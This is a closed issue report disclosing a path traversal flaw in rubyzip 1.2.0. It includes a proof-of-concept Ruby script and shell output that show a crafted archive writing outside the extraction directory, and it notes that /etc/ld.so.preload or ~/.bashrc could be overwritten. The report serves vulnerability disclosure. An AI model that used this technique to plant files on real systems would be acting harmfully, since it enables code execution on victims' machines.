Closed
Description
Overview
Rubyzip module allows to overwrite or create arbitrary files via relative filenames and thus executing malicious code, e.g. by writing to /etc/ld.so.preload, ~/.bashrc etc.
Proof of concept:
>> unzip traversal.zip
Archive: traversal.zip
warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../tmp/zip_attack123
inflating: tmp/zip_attack123
>> ls -al /tmp/zip_attack123
ls: cannot access '/tmp/zip_attack123': No such file or directory
>> ruby rubyzip_test_traversal.rb
Invalid date/time in zip entry
Extracting ../../../../../../../../../../../../../../tmp/zip_attack123
Invalid date/time in zip entry
>> ls -al /tmp/zip_attack123
-rw-r--r-- 1 anon wheel 11 Jan 31 23:24 /tmp/zip_attack123rubyzip_test_traversal.rb:
require 'zip'
Zip::File.open('traversal.zip') do |zip_file|
# Handle entries one by one
zip_file.each do |entry|
# Extract to file/directory/symlink
puts "Extracting #{entry.name}"
entry.extract(entry.name)
end
endVulnerable version and test environment
>> uname -rsv
Darwin 16.3.0 Darwin Kernel Version 16.3.0: Thu Nov 17 20:23:58 PST 2016; root:xnu-3789.31.2~1/RELEASE_X86_64
>> ruby --version
ruby 2.3.3p222 (2016-11-21 revision 56859) [x86_64-darwin16]
>> gem list | grep zip
rubyzip (1.2.0)Analogous vulnerability in minitar gem: halostatue/minitar#16
Metadata
Metadata
Assignees
Labels
No labels